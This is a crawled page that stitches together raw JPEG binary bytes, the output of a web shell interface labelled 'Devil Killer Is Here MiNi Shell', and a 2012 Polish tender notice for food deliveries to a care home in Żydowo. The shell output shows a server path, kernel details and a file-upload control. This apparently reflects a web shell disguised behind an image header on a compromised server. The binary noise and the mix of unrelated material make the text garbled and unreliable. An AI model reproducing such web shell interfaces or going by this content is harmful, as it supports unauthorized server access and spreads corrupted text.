JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121030/425380-N-2012.html

<p class="kh_header"><b>Żydowo: SUKCESYWNE DOSTAWY ARTYKUŁÓW SPOŻYWCZYCH 
NA POTRZEBY DOMU POMOCY SPOŁECZNEJ W ŻYDOWIE</b><br>
<b>Numer ogłoszenia: 425380 - 2012; data zamieszczenia: 30.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Żydowie , Żydowo 112, 76-012 Żydowo, woj. zachodniopomorskie, tel. 094 3188879, -87, - 89, faks 094 3188879.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> dps.zydowo.ibip.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednpstka Organizacyjna Samorządu Terytorilnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNE DOSTAWY ARTYKUŁÓW SPOŻYWCZYCH 
NA POTRZEBY DOMU POMOCY SPOŁECZNEJ W ŻYDOWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Przedmiotem zamówienia są sukcesywne dostawy artykułów spożywczych na potrzeby Domu 
      Pomocy Społecznej w Żydowie (CPV 03000000-1 Produkty rolnictwa, hodowli, rybołówstwa,  
      leśnictwa i podobne; CPV  15000000-8 Żywność, napoje)  z podziałem na części:

Część Nr 1 Sukcesywna dostawa   mięsa  wieprzowego, produktów mięsnych i wędlin
Część Nr 2   Sukcesywna dostawa   mięsa drobiowego produktów mięsnych  i wędlin  
Część nr 3 - Sukcesywne dostawy produktów ogólno-spożywczych
Część nr 4 - Sukcesywne dostawy pieczywa, świeżych wyrobów piekarskich i  ciastkarskich  
Cześć nr 5 -Sukcesywne dostawy mleka, produktów mleczarskich i tłuszczy
Część nr 6 - Sukcesywne dostawy świeżych warzyw, owoców i ziemniaków
Część nr 7 -Sukcesywne dostawy ryb przetworzonych i konserwowanych
Część nr 8   - Sukcesywne dostawy jaj konsumpcyjnych 
1)	Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia z podziałem na osiem części.
2)	Dostawa przedmiotu zamówienia następować będzie loco magazyn żywnościowy Domu Pomocy Społecznej w Żydowie transportem Wykonawcy na jego koszt i ryzyko.

4)	Artykuły będące przedmiotem zamówienia będą wytworzone i dostarczane zgodnie z ustawą o bezpieczeństwie żywności i żywienia z dnia 25.08.2006r. (tj. Dz. U. 2010 Nr 136, poz. 914 z późn. zm.) oraz aktualnych rozporządzeń wydanych na jej podstawie.

5)	Wykonawca gwarantuje wysoką jakość artykułów zgodną z normami oraz zobowiązuje się do udzielenia gwarancji jakościowej na dostarczane artykuły (min. ? okresu określonego przez producenta), gwarancja rozpoczyna swój bieg od dnia odbioru przez Zamawiającego.Gwarancja rozpoczyna swój bieg od daty odbioru każdej partii towaru.

6)	Przedmiot dostawy powinien posiadać aktualny termin przydatności do spożycia oraz odpowiadać co do jakości normom i atestom obowiązującym w Polsce.

8)	Aktualny termin przydatności artykułów do spożycia,  ma być oznaczony na każdym artykule  w zależności od kategorii w sposób  czytelny,

9)	Na każde żądanie Zamawiającego Wykonawca jest zobowiązany okazać w stosunku do każdego artykułu w zależności od kategorii odpowiedni certyfikat zgodności z obowiązującymi normami.

10)	Dostawy częściowe, o których mowa w pkt 1 następować będą w terminie nie dłuższym niż 2 dni robocze od daty otrzymania zamówienia, chyba że Zamawiający ustali dłuższy termin.

11)	Zamówienie składane  na dostawę  przesłane będzie faxem lub telefoniczne.
12)	Zamawiane artykuły powinny być dostarczane w opakowaniach (skrzynki, pojemniki itp.). Opakowanie powinno być dostosowane do właściwości danego artykułu i odpowiednie z punktu widzenia higieny i bezpieczeństwa zdrowotnego żywności, zgodnie z obowiązującymi przepisami. Środki transportu powinny być czyste i bez obcych zapachów.

13)	Wykonawca zapewnia dostawy przedmiotu zamówienia  przez cały okres trwania umowy.

14)	Zamawiający zastrzega sobie prawo do niewykorzystania  pełnego limitu ilościowego   przedmiotu zamówienia   bez prawa roszczeń z tego  tytułu przez Wykonawcę ,a w szczególności z tytułu niezrealizowania umowy do pełnej wartości. Przysługuje  mu tylko   zapłata za faktycznie dostarczoną ilość.

15)	Zamawiający zastrzega sobie prawo zmian ilościowych asortymentu danej części określonego w  załączniku nr 1 do niniejszej siwz w granicach ogólnej wartości danej części zamówienia. Zmiany te nie stanowią zmiany umowy. 

16)	W związku z obowiązującym w Domu Pomocy Społecznej systemem HACCP należy przedstawić  w momencie rozpoczęcia dostaw i na żądanie SANEPID-u   n/w dokumenty:
a)	Decyzja Państwowego Powiatowego Inspektoratu Sanitarnego dla środka transportu zezwalająca na przewóz produktów spożywczych.
b)	Aktualne orzeczenie lekarskie z badania do celów sanitarno-  epidemiologicznych osoby dostarczającej towar

17)	Umożliwienie kontroli środka transportu i pojemników (opakowań) do przewozu towaru pod    kątem czystości.
18)	Do każdej dostawy Wykonawca dołącza:
.	handlowy dokument identyfikacyjny
.	WZ lub Fakturę

19)	   Odbioru jakościowego artykułów  dokonuje Zamawiający w chwili ich dostawy.

20)	  Jako termin realizacji dostawy rozumie się datę złożenia podpisu na dokumencie odbioru dostawy  przez
         osobę  upoważnioną do odbioru ze strony Zamawiającego.

21)	   W przypadku dostarczenia artykułów z wadami lub brakami Wykonawca dokona wymiany lub ich
          uzupełnienia na artykuły wolne od wad na swój koszt w terminie 24 godzin od dostawy artykułów.

22)	   W razie wykrycia w terminie późniejszym wad w przedmiocie dostawy Zamawiający zobowiązany jest 
          niezwłocznie złożyć Wykonawcy reklamację pisemnie lub ustnie do dokumentu odbioru.

23)	   Załatwienie reklamacji winno nastąpić niezwłocznie w trybie indywidualnych uzgodnień i w sposób
          właściwy dla danego towaru, nie później niż w ciągu 2 dni.
W przypadku niedostarczenia przez Wykonawcę artykułów wcześniej zamówionych, o niższej niż  
         deklarowana jakości lub w jakikolwiek inny sposób niezgodnej z przedmiotem zamówienia,  
         Zamawiającemu przysługuje prawo do zakupu interwencyjnego odpowiedniej ilości artykułów, będących 
         przedmiotem dostawy, na wolnym rynku od innego dostawcy w ilości i asortymencie nie zrealizowanej 
         dostawy.

25)	   W przypadku zakupu interwencyjnego Wykonawca zobowiązany jest do zwrotu Zamawiającemu różnicy 
          pomiędzy ceną zakupu interwencyjnego, a  ceną dostawy ustaloną w zawartej z Wykonawcą umowie.
   
26)	  W szczególnych przypadkach wynikających z okoliczności, których nie można było przewidzieć, na   
         etapie prowadzonego postępowania o udzielenie zamówienia publicznego; np. zaprzestanie produkcji, 
         zmiana nazwy asortymentu, dopuszcza się możliwość zastąpienia go towarem o  nie gorszych 
         parametrach i w tej samej cenie.

27)	  Płatność będzie realizowana sukcesywnie po każdej dostawie przedmiotu zamówienia do  
         Zamawiającego,  na podstawie faktur  wystawianych   na płatnika  Dom Pomocy Społecznej w  Żydowie 
         w terminie 30 dni, licząc od daty  doręczenia  faktury do  Zamawiającego. Należność płatna przelewem
         na rachunek Wykonawcy.
28)	Wykonawca realizujący przedmiot zamówienia  z wykorzystaniem podwykonawców zobowiązany jest do wskazania w swojej ofercie części zamówienia(zakresu),których wykonanie zamierza powierzyć podwykonawcom. Wykonawca ponosi odpowiedzialność za jakość realizacji przedmiotu zamówienia przez podwykonawców oraz zobowiązany jest do zapłaty wynagrodzenia na ich rzecz.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 03.14.25.00-3, 03.20.00.00-3, 15.00.00.00-8, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.33.00.00-0, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6, 15.98.10.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia  wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany udokumentować wykonanie w okresie ostatnich trzech lat przedupływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie co najmniej jednej dostawy  odpowiadającej swoim  rodzajem oraz porównywalną  wartością dostawom  stanowiącym przedmiot zamówienia  tj. Sukcesywne dostawy  artykułów spożywczych na potrzeby Domu Pomocy Społecznej w Zydowie Część Nr ...........Wykonawca musi złożyć wykaz  na/wg   załącznika nr 5 do SIWZ wraz z   wymaganymi   dokumentami potwierdzającymi, że dostawy zostały wykonane należycie; Ocena spełniania ww warunków zostanie dokonana w oparciu o złożone przez Wykonawcę oświadczenia i dokumenty metodą spełnia -nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	SZCZEGÓŁOWE ZESTAWIENIE ILOŚCIOWE PRZEDMIOTU   
 ZAMÓWIENIA  Część Nr................ wypełnione na/wg Załącznika nr 1 do SIWZ. 

2)	WYPEŁNIONY FORMULARZ OFERTOWY  na/wg Załącznika nr 2 do SIWZ. 

3)	Jeżeli oferta nie zostanie podpisana przez Wykonawcę do oferty należy dołączyć
 PEŁNOMOCNICTWO(A) lub UPOWAŻNIENIE(A) do działania w imieniu Wykonawcy
 (podpisanie oferty, reprezentowanie Wykonawcy ewentualnie inne działania np. 
 podpisanie umowy) - o ile umocowanie(a) osoby(ób) występującej(cych) w imieniu  Wykonawcy nie wynikają z innych złożonych dokumentów. W przypadku gdy Wykonawca prowadzi działalność w formie spółki cywilnej, a oferta nie zostanie podpisana przez wszystkich wspólników, należy przedłożyć dodatkowe dokumenty, z których będą wynikały uprawnienia wspólnika(ów) podpisujących ofertę (umowa spółki, pełnomocnictwo lub inne).
4)	OŚWIADCZENIE WYKONAWCY, ze posiada atesty na dostarczane    
 produkty(HACCP lub Handlowy Dokument  Identyfikacyjny),a także oświadczenie, iż 
 na każde żądanie Zamawiającego   przedstawi dokumenty    potwierdzające to 
 oświadczenie na/wg Załącznika nr 7 do SIWZ
5)	DOKUMENTY PODMIOTÓW ZAGRANICZNYCH:
W świetle postawionych w niniejszym postępowaniu warunków udziału w postępowaniu, Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składają oświadczenia i dokumenty takie jak Wykonawcy polscy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony ustalają, że treść umowy może ulec zmianie zgodnie z art. 144 ustawy Prawo zamówień  
       publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późniejszymi zmianami ).
2.    Zmiany postanowień niniejszej umowy mogą dotyczyć w szczególności:
        1) nazwy, adresu oraz osób reprezentujących strony
        2) urzędowej stawki podatku VAT 
        3) każdej zmiany, która jest korzystna lub neutralna dla zamawiającego, lub zmiany której nie można było 
         przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego;
3.	Zmiany postanowień niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.
4.	Strona wnioskująca o zmianę postanowień niniejszej umowy niezwłocznie i pisemnie powiadamia 
     o tym fakcie drugą stronę, uzasadniając zmianę okolicznościami faktycznymi i prawnymi oraz 
     przedkłada propozycję zmian do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> dps.zydowo.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Domu Pomocy Społecznej w Żydowie , 76 - 012 Żydowo 107, pow. Koszalin  pok.3, w dni robocze w godz.od 9.00 - 14.00,tel.(094)  318-88-87 wew.34, fax:  094  318-88-.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.11.2012 godzina 10:00, miejsce: DOM POMOCY SPOŁECZNEJ W ŻYDOWIE   76 - 012 Żydowo107,
pow. Koszalin ,  pokój nr 5(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sukcesywna dostawa   mięsa  wieprzowego, produktów mięsnych i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywna dostawa   mięsa  wieprzowego, produktów mięsnych i wędlin na potrzeby Domu Pomocy Społecznej w Żydowie 
Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sukcesywna dostawa   mięsa drobiowego produktów mięsnych  i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy dostawa   mięsa drobiowego produktów mięsnych  i wędlinna potrzeby Domu Pomocy Społecznej w Żydowie 
Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sukcesywne dostawy produktów ogólno-spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy produktów ogólno-spożywczych na potrzeby Domu  Pomocy Społecznej w Żydowie 
Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.00.00-0, 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6, 15.98.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Sukcesywne dostawy pieczywa, świeżych wyrobów piekarskich i  ciastkarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy pieczywa, świeżych wyrobów piekarskich i  ciastkarskich na potrzeby Domu Pomocy Społecznej w Żydowie 
Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Sukcesywne dostawy mleka, produktów mleczarskich i tłuszczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy mleka, produktów mleczarskich i tłuszczy na potrzeby Domu  Pomocy Społecznej w Żydowie.
Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia Cześć NR 5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.40.00.00-2, 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Sukcesywne dostawy świeżych warzyw, owoców i ziemniaków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy świeżych warzyw, owoców i ziemniaków na potrzeby Domu Pomocy Społecznej w Żydowie .

Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia Część Nr 6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 03.30.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
